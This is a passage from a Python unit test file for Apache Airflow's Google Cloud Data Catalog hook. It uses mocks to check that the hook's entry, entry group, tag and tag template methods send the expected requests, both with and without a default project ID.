timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.create_entry_group.assert_called_once_with(
request=dict(
parent=TEST_LOCATION_PATH.format(TEST_PROJECT_ID_1),
entry_group_id=TEST_ENTRY_GROUP_ID,
entry_group=TEST_ENTRY_GROUP,
),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, TEST_PROJECT_ID_1),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_create_tag(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.create_tag(
location=TEST_LOCATION,
entry_group=TEST_ENTRY_GROUP_ID,
entry=TEST_ENTRY_ID,
tag=deepcopy(TEST_TAG),
template_id=TEST_TAG_TEMPLATE_ID,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.create_tag.assert_called_once_with(
request=CreateTagRequest(
parent=TEST_ENTRY_PATH.format(TEST_PROJECT_ID_1),
tag=Tag(template=TEST_TAG_TEMPLATE_PATH.format(TEST_PROJECT_ID_1)),
),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, TEST_PROJECT_ID_1),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_create_tag_protobuff(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.create_tag(
location=TEST_LOCATION,
entry_group=TEST_ENTRY_GROUP_ID,
entry=TEST_ENTRY_ID,
tag=Tag(),
template_id=TEST_TAG_TEMPLATE_ID,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.create_tag.assert_called_once_with(
request=CreateTagRequest(
parent=TEST_ENTRY_PATH.format(TEST_PROJECT_ID_1),
tag=Tag(template=TEST_TAG_TEMPLATE_PATH.format(TEST_PROJECT_ID_1)),
),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, TEST_PROJECT_ID_1),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_create_tag_template(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.create_tag_template(
location=TEST_LOCATION,
tag_template_id=TEST_TAG_TEMPLATE_ID,
tag_template=TEST_TAG_TEMPLATE,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.create_tag_template.assert_called_once_with(
request=CreateTagTemplateRequest(
parent=TEST_LOCATION_PATH.format(TEST_PROJECT_ID_1),
tag_template_id=TEST_TAG_TEMPLATE_ID,
tag_template=TEST_TAG_TEMPLATE,
),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, TEST_PROJECT_ID_1),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_create_tag_template_field(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.create_tag_template_field(
location=TEST_LOCATION,
tag_template=TEST_TAG_TEMPLATE_ID,
tag_template_field_id=TEST_TAG_TEMPLATE_FIELD_ID,
tag_template_field=TEST_TAG_TEMPLATE_FIELD,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.create_tag_template_field.assert_called_once_with(
request=dict(
parent=TEST_TAG_TEMPLATE_PATH.format(TEST_PROJECT_ID_1),
tag_template_field_id=TEST_TAG_TEMPLATE_FIELD_ID,
tag_template_field=TEST_TAG_TEMPLATE_FIELD,
),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, TEST_PROJECT_ID_1),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_delete_entry(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.delete_entry(
location=TEST_LOCATION,
entry_group=TEST_ENTRY_GROUP_ID,
entry=TEST_ENTRY_ID,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.delete_entry.assert_called_once_with(
request=dict(
name=TEST_ENTRY_PATH.format(TEST_PROJECT_ID_1),
),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, TEST_PROJECT_ID_1),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_delete_entry_group(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.delete_entry_group(
location=TEST_LOCATION,
entry_group=TEST_ENTRY_GROUP_ID,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.delete_entry_group.assert_called_once_with(
request=dict(
name=TEST_ENTRY_GROUP_PATH.format(TEST_PROJECT_ID_1),
),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, TEST_PROJECT_ID_1),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_delete_tag(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.delete_tag(
location=TEST_LOCATION,
entry_group=TEST_ENTRY_GROUP_ID,
entry=TEST_ENTRY_ID,
tag=TEST_TAG_ID,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.delete_tag.assert_called_once_with(
request=dict(
name=TEST_TAG_PATH.format(TEST_PROJECT_ID_1),
),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, TEST_PROJECT_ID_1),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_delete_tag_template(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.delete_tag_template(
location=TEST_LOCATION,
tag_template=TEST_TAG_TEMPLATE_ID,
force=TEST_FORCE,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.delete_tag_template.assert_called_once_with(
request=dict(name=TEST_TAG_TEMPLATE_PATH.format(TEST_PROJECT_ID_1), force=TEST_FORCE),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, TEST_PROJECT_ID_1),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_delete_tag_template_field(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.delete_tag_template_field(
location=TEST_LOCATION,
tag_template=TEST_TAG_TEMPLATE_ID,
field=TEST_TAG_TEMPLATE_FIELD_ID,
force=TEST_FORCE,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.delete_tag_template_field.assert_called_once_with(
request=dict(
name=TEST_TAG_TEMPLATE_FIELD_PATH.format(TEST_PROJECT_ID_1),
force=TEST_FORCE,
),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, TEST_PROJECT_ID_1),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_get_entry(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.get_entry(
location=TEST_LOCATION,
entry_group=TEST_ENTRY_GROUP_ID,
entry=TEST_ENTRY_ID,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.get_entry.assert_called_once_with(
request=dict(
name=TEST_ENTRY_PATH.format(TEST_PROJECT_ID_1),
),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, TEST_PROJECT_ID_1),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_get_entry_group(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.get_entry_group(
location=TEST_LOCATION,
entry_group=TEST_ENTRY_GROUP_ID,
read_mask=TEST_READ_MASK,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.get_entry_group.assert_called_once_with(
request=dict(
name=TEST_ENTRY_GROUP_PATH.format(TEST_PROJECT_ID_1),
read_mask=TEST_READ_MASK,
),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, TEST_PROJECT_ID_1),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_get_tag_template(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.get_tag_template(
location=TEST_LOCATION,
tag_template=TEST_TAG_TEMPLATE_ID,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.get_tag_template.assert_called_once_with(
request=dict(
name=TEST_TAG_TEMPLATE_PATH.format(TEST_PROJECT_ID_1),
),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, TEST_PROJECT_ID_1),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_list_tags(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.list_tags(
location=TEST_LOCATION,
entry_group=TEST_ENTRY_GROUP_ID,
entry=TEST_ENTRY_ID,
page_size=TEST_PAGE_SIZE,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.list_tags.assert_called_once_with(
request=dict(
parent=TEST_ENTRY_PATH.format(TEST_PROJECT_ID_1),
page_size=TEST_PAGE_SIZE,
),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, TEST_PROJECT_ID_1),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_get_tag_for_template_name(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
tag_1 = mock.MagicMock(template=TEST_TAG_TEMPLATE_PATH.format("invalid-project"))
tag_2 = mock.MagicMock(template=TEST_TAG_TEMPLATE_PATH.format(TEST_PROJECT_ID_1))
mock_get_conn.return_value.list_tags.return_value = [tag_1, tag_2]
result = self.hook.get_tag_for_template_name(
location=TEST_LOCATION,
entry_group=TEST_ENTRY_GROUP_ID,
entry=TEST_ENTRY_ID,
template_name=TEST_TAG_TEMPLATE_PATH.format(TEST_PROJECT_ID_1),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.list_tags.assert_called_once_with(
request=dict(
parent=TEST_ENTRY_PATH.format(TEST_PROJECT_ID_1),
page_size=100,
),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
assert result == tag_2
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, TEST_PROJECT_ID_1),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_rename_tag_template_field(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.rename_tag_template_field(
location=TEST_LOCATION,
tag_template=TEST_TAG_TEMPLATE_ID,
field=TEST_TAG_TEMPLATE_FIELD_ID,
new_tag_template_field_id=TEST_NEW_TAG_TEMPLATE_FIELD_ID,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.rename_tag_template_field.assert_called_once_with(
request=dict(
name=TEST_TAG_TEMPLATE_FIELD_PATH.format(TEST_PROJECT_ID_1),
new_tag_template_field_id=TEST_NEW_TAG_TEMPLATE_FIELD_ID,
),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, TEST_PROJECT_ID_1),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_update_entry(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.update_entry(
entry=TEST_ENTRY,
update_mask=TEST_UPDATE_MASK,
location=TEST_LOCATION,
entry_group=TEST_ENTRY_GROUP_ID,
entry_id=TEST_ENTRY_ID,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.update_entry.assert_called_once_with(
request=dict(
entry=Entry(name=TEST_ENTRY_PATH.format(TEST_PROJECT_ID_1)),
update_mask=TEST_UPDATE_MASK,
),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, TEST_PROJECT_ID_1),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_update_tag(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.update_tag(
tag=deepcopy(TEST_TAG),
update_mask=TEST_UPDATE_MASK,
location=TEST_LOCATION,
entry_group=TEST_ENTRY_GROUP_ID,
entry=TEST_ENTRY_ID,
tag_id=TEST_TAG_ID,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.update_tag.assert_called_once_with(
request=dict(tag=Tag(name=TEST_TAG_PATH.format(TEST_PROJECT_ID_1)), update_mask=TEST_UPDATE_MASK),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, TEST_PROJECT_ID_1),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_update_tag_template(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.update_tag_template(
tag_template=TEST_TAG_TEMPLATE,
update_mask=TEST_UPDATE_MASK,
location=TEST_LOCATION,
tag_template_id=TEST_TAG_TEMPLATE_ID,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.update_tag_template.assert_called_once_with(
request=dict(
tag_template=TagTemplate(name=TEST_TAG_TEMPLATE_PATH.format(TEST_PROJECT_ID_1)),
update_mask=TEST_UPDATE_MASK,
),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, TEST_PROJECT_ID_1),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_update_tag_template_field(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.update_tag_template_field(
tag_template_field=TEST_TAG_TEMPLATE_FIELD,
update_mask=TEST_UPDATE_MASK,
tag_template=TEST_TAG_TEMPLATE_ID,
location=TEST_LOCATION,
tag_template_field_id=TEST_TAG_TEMPLATE_FIELD_ID,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.update_tag_template_field.assert_called_once_with(
request=dict(
name=TEST_TAG_TEMPLATE_FIELD_PATH.format(TEST_PROJECT_ID_1),
tag_template_field=TEST_TAG_TEMPLATE_FIELD,
update_mask=TEST_UPDATE_MASK,
),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
class TestCloudDataCatalogWithoutDefaultProjectIdHook(TestCase):
def setUp(
self,
) -> None:
with mock.patch(
"airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.__init__",
new=mock_base_gcp_hook_no_default_project_id,
):
self.hook = CloudDataCatalogHook(gcp_conn_id="test")
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_create_entry(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.create_entry(
location=TEST_LOCATION,
entry_group=TEST_ENTRY_GROUP_ID,
entry_id=TEST_ENTRY_ID,
entry=TEST_ENTRY,
project_id=TEST_PROJECT_ID_2,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.create_entry.assert_called_once_with(
request=dict(
parent=TEST_ENTRY_GROUP_PATH.format(TEST_PROJECT_ID_2),
entry_id=TEST_ENTRY_ID,
entry=TEST_ENTRY,
),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_create_entry_group(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.create_entry_group(
location=TEST_LOCATION,
entry_group_id=TEST_ENTRY_GROUP_ID,
entry_group=TEST_ENTRY_GROUP,
project_id=TEST_PROJECT_ID_2,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.create_entry_group.assert_called_once_with(
request=dict(
parent=TEST_LOCATION_PATH.format(TEST_PROJECT_ID_2),
entry_group_id=TEST_ENTRY_GROUP_ID,
entry_group=TEST_ENTRY_GROUP,
),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_create_tag(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.create_tag(
location=TEST_LOCATION,
entry_group=TEST_ENTRY_GROUP_ID,
entry=TEST_ENTRY_ID,
tag=deepcopy(TEST_TAG),
template_id=TEST_TAG_TEMPLATE_ID,
project_id=TEST_PROJECT_ID_2,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.create_tag.assert_called_once_with(
request=CreateTagRequest(
parent=TEST_ENTRY_PATH.format(TEST_PROJECT_ID_2),
tag=Tag(template=TEST_TAG_TEMPLATE_PATH.format(TEST_PROJECT_ID_2)),
),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_create_tag_protobuff(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.create_tag(
location=TEST_LOCATION,
entry_group=TEST_ENTRY_GROUP_ID,
entry=TEST_ENTRY_ID,
tag=Tag(),
template_id=TEST_TAG_TEMPLATE_ID,
project_id=TEST_PROJECT_ID_2,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.create_tag.assert_called_once_with(
request=CreateTagRequest(
parent=TEST_ENTRY_PATH.format(TEST_PROJECT_ID_2),
tag=Tag(template=TEST_TAG_TEMPLATE_PATH.format(TEST_PROJECT_ID_2)),
),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_create_tag_template(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.create_tag_template(
location=TEST_LOCATION,
tag_template_id=TEST_TAG_TEMPLATE_ID,
tag_template=TEST_TAG_TEMPLATE,
project_id=TEST_PROJECT_ID_2,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.create_tag_template.assert_called_once_with(
request=CreateTagTemplateRequest(
parent=TEST_LOCATION_PATH.format(TEST_PROJECT_ID_2),
tag_template_id=TEST_TAG_TEMPLATE_ID,
tag_template=TEST_TAG_TEMPLATE,
),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_create_tag_template_field(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.create_tag_template_field(
location=TEST_LOCATION,
tag_template=TEST_TAG_TEMPLATE_ID,
tag_template_field_id=TEST_TAG_TEMPLATE_FIELD_ID,
tag_template_field=TEST_TAG_TEMPLATE_FIELD,
project_id=TEST_PROJECT_ID_2,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.create_tag_template_field.assert_called_once_with(
request=dict(
parent=TEST_TAG_TEMPLATE_PATH.format(TEST_PROJECT_ID_2),
tag_template_field_id=TEST_TAG_TEMPLATE_FIELD_ID,
tag_template_field=TEST_TAG_TEMPLATE_FIELD,
),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_delete_entry(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.delete_entry(
location=TEST_LOCATION,
entry_group=TEST_ENTRY_GROUP_ID,
entry=TEST_ENTRY_ID,
project_id=TEST_PROJECT_ID_2,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.delete_entry.assert_called_once_with(
request=dict(name=TEST_ENTRY_PATH.format(TEST_PROJECT_ID_2)),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_delete_entry_group(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.delete_entry_group(
location=TEST_LOCATION,
entry_group=TEST_ENTRY_GROUP_ID,
project_id=TEST_PROJECT_ID_2,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.delete_entry_group.assert_called_once_with(
request=dict(name=TEST_ENTRY_GROUP_PATH.format(TEST_PROJECT_ID_2)),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_delete_tag(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.delete_tag(
location=TEST_LOCATION,
entry_group=TEST_ENTRY_GROUP_ID,
entry=TEST_ENTRY_ID,
tag=TEST_TAG_ID,
project_id=TEST_PROJECT_ID_2,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.delete_tag.assert_called_once_with(
request=dict(name=TEST_TAG_PATH.format(TEST_PROJECT_ID_2)),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_delete_tag_template(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.delete_tag_template(
location=TEST_LOCATION,
tag_template=TEST_TAG_TEMPLATE_ID,
force=TEST_FORCE,
project_id=TEST_PROJECT_ID_2,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.delete_tag_template.assert_called_once_with(
request=dict(name=TEST_TAG_TEMPLATE_PATH.format(TEST_PROJECT_ID_2), force=TEST_FORCE),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_delete_tag_template_field(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.delete_tag_template_field(
location=TEST_LOCATION,
tag_template=TEST_TAG_TEMPLATE_ID,
field=TEST_TAG_TEMPLATE_FIELD_ID,
force=TEST_FORCE,
project_id=TEST_PROJECT_ID_2,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.delete_tag_template_field.assert_called_once_with(
request=dict(name=TEST_TAG_TEMPLATE_FIELD_PATH.format(TEST_PROJECT_ID_2), force=TEST_FORCE),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_get_entry(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.get_entry(
location=TEST_LOCATION,
entry_group=TEST_ENTRY_GROUP_ID,
entry=TEST_ENTRY_ID,
project_id=TEST_PROJECT_ID_2,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.get_entry.assert_called_once_with(
request=dict(name=TEST_ENTRY_PATH.format(TEST_PROJECT_ID_2)),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_get_entry_group(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.get_entry_group(
location=TEST_LOCATION,
entry_group=TEST_ENTRY_GROUP_ID,
read_mask=TEST_READ_MASK,
project_id=TEST_PROJECT_ID_2,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.get_entry_group.assert_called_once_with(
request=dict(
name=TEST_ENTRY_GROUP_PATH.format(TEST_PROJECT_ID_2),
read_mask=TEST_READ_MASK,
),
retry=TEST_RETRY,
